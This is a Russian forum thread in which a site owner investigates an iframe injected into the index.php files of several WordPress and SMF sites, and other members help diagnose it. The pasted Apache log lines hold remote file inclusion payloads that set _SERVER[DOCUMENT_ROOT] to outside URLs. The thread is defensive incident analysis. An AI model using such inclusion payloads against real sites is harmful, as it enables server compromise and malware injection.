Меня поломали слегка

[cool]

Вчера сижу на своём форуме, никого не трогаю. В какой то момент замечаю, что страница долго грузится, отправляя (получая ли) запрос на что-то вроде dajtedenegmnesejchas.com.
Смотрю код страницы - в футере, в самом низу, добавлен iframe код со ссылкой на вышеуказанный сайт. Смотрю остальные сайты на этом ftp - код вставлен на всех сайтах в index.php.
Разные движки сайтов, есть Wordpress и SMF (форум), на последний, кстати, грешу больше всего.

Теперь вопрос: КАК? Доступа по фтп небыло - логи фтп чистые. Пароли в клиентах и браузерах не храню - вбиваю вручную или копипастю. Проверился на вирусы - NOD молчит, avz нашёл кучу всего, но ведь явно дело не в вирусах, если доступа по фтп небыло?

В общем, стандартную процедуру я сделал - всё что можно было поменять, поменял, всё что можно было вычистить - вычистил.
Может кто подскажет ещё: как по логам узнать, откуда пришла зараза и что происходило с сайтами?

[papokarlo]

могли троем своровать...

[Max.im]

Цитата:

Сообщение от cool

Теперь вопрос: КАК? Доступа по фтп небыло

Скорее всего инклуд был, логи апаче смотрите

[shadx]

вирутал хосты на серванте в одной папке ???
если да, то через дырку в движке шел сделали.

[cool]

Цитата:

Сообщение от shadx

вирутал хосты на серванте в одной папке ???

если имеется ввиду public_html, то да - все сайты в этой папке, но в разных подпапках.

Почти ламерские вопросы: где лежат логи апача и на что именно там обратить внимание?

[shadx]

Цитата:

Сообщение от cool

если имеется ввиду public_html, то да - все сайты в этой папке, но в разных подпапках.

Почти ламерские вопросы: где лежат логи апача и на что именно там обратить внимание?

полностью зависит от хостинга настроек и панели управления ...
Если есть чего нить типа webstata ... то там можно поискать "неправильные" запросы к сайту

[Max.im]

Цитата:

Сообщение от cool

и на что именно там обратить внимание?

на присутствие левых данных(урлов) в запросах к сайту

[cool]

Хм. Влогах доступа к форуму есть:

216.139.67.116 - - [22/Jun/2009:01:10:22 +0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.0" 200 29899 "-" "Mozilla/5.0"
216.139.67.116 - - [22/Jun/2009:01:10:22 +0400] "GET /index.php?action=sitemap;xml/?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.0" 200 17769 "-" "Mozilla/5.0"

Описание нашёл здесь: http://www.lh-news.com/main.php
Real-Time Internet Report on Jun 2009 Dangerous Domains

Только по времени не сходится - в час ночи по москве я уже всё почистил... Посмотрю ещё

Добавлено через 1 час 40 минут
Нашёл ещё один запрос с того же айпишника (это уже в логах форума - все остальные логи чистые):

http://***************.ru/index.php?...p;xml/?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf??

Если я правильно понимаю, хакают через плагин сайтмапы. Пошёл курить форумы.
Всем спасибо!

[zhegloff]

cool, register_globals=Off

[zeta]

поставила на всех индексных права 444, после такого..